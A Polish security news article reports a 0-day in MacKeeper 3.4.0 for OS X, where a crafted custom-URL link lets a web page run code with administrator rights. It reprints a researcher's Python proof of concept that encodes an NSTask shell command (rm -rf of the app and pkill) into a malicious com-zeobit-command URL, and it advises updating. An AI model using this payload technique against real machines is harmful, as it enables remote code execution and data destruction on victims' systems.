MacKeeper – antywirus dla OS X z załataną luką 0-day

13 maja 2015

Jeśli Twój sprzęt od Apple chroni ukraiński antywirus MacKeeper w wersji 3.4.0 lub wcześniejszej, jesteś potencjalną ofiarą ataku nieautoryzowanego wykonania zdalnego kodu z uprawnieniami administratora. Na trop podatności wpadł badacz z firmy SecureMac, który przedstawił proof of concept:

import sys,base64
from Foundation import *
RUN_CMD = "rm -rf /Applications/MacKeeper.app;pkill -9 -a MacKeeper"
d = NSMutableData.data()
a = NSArchiver.alloc().initForWritingWithMutableData_(d)
a.encodeValueOfObjCType_at_("@",NSString.stringWithString_("NSTask"))
a.encodeValueOfObjCType_at_("@",NSDictionary.dictionaryWithObjectsAndKeys_(NSString.stringWithString_("/bin/sh"),"LAUNCH_PATH",NSArray.arrayWithObjects_(NSString.stringWithString_("-c"),NSString.stringWithString_(RUN_CMD),None),"ARGUMENTS",NSString.stringWithString_("Your computer has malware that needs to be removed."),"PROMPT",None))
print "com-zeobit-command:///i/ZBAppController/performActionWithHelperTask:arguments:/"+base64.b64encode(d)

MacKeeper jest tworem ukraińskiej firmy ZeoBIT. Zaprogramowano go w celu zwiększenia wydajności systemu oraz bezpieczeństwa komputerów Mac. Do tej pory udało mu się zyskać całkiem sporą publikę – podana informacja na stronie przez producenta pokazuje wyraźnie, że 20 milionów pobrań nie może być czymś przypadkowym. Niestety w sieci można znaleźć całkiem sporo negatywnych opinii o tym sofcie. Użytkownicy narzekają na wyskakujące okienka reklamowe, które wciskają dodatkowe programy producenta podkreślając konieczność oczyszczenia systemu ze zbędnych śmieci.

O co chodzi?

Luka została odkryta w mechanizmie walidacji adresów URL, które używane są podczas interakcji użytkownika z systemem OS X, iOS a zainstalowanymi programami. Zdefiniowanie własnych URL-i pozwoli przypisać np. kliknięciu myszą w adres e-mail otworzenie aplikacji Mail.app do napisania nowej wiadomości.

Przedstawiony dowód koncepcji umożliwia atakującemu ominięcie tego zabezpieczenia i wykonanie własnego kodu. Oczywiście, aby się to stało ofiara musi najpierw odwiedzić podstawioną stronę internetową, w wyniku czego napastnik może wykonać dowolny kod z uprawnieniami administratora, lub jak w przypadku proof of concept zmusić antywirusa MacKeeper do auto-deinstalacji.  

Zalecamy aktualizację MacKeeper do wersji 3.4.1 lub późniejszej, albo też pozbycie się program na rzecz innego.

PODZIEL SIĘ:

Share on facebook
Share on twitter
Share on linkedin
Share on email
AUTOR: Adrian Ścibor
Redaktor prowadzący AVLab.pl i CheckLab.pl.
guest
0 komentarzy
Inline Feedbacks
View all comments

Newsletter

BĄDŹ ZAWSZE NA BIEŻĄCO!

Newsletter

ZAPISZ SIĘ NA POWIADOMIENIA
BĄDŹ ZAWSZE NA BIEŻĄCO!
zapisz się

Bitdefender GravityZone Webinarium

Dowiedz się, co eksperci mówią o GravityZone

POLECANE PRODUKTY

YUBIKEY

Klucze zabezpieczające

100% ochrony przed phishingiem

Newsletter

BĄDŹ ZAWSZE NA BIEŻĄCO!

Newsletter

ZAPISZ SIĘ NA POWIADOMIENIA
BĄDŹ ZAWSZE NA BIEŻĄCO!
zapisz się

Newsletter

BĄDŹ ZAWSZE NA BIEŻĄCO!

Newsletter

ZAPISZ SIĘ NA POWIADOMIENIA E-MAIL I ZAWSZE BĄDŹ NA BIEŻĄCO!
zapisz się

POLECANE PRODUKTY

YUBICO

Klucze zabezpieczające

SILNE UWIERZYTELNIANIE DWUSKŁADNIKOWE, WIELOSKŁADNIKOWE I BEZ HASŁA

Bitdefender GravityZone Webinarium

Dowiedz się, co eksperci mówią o GravityZone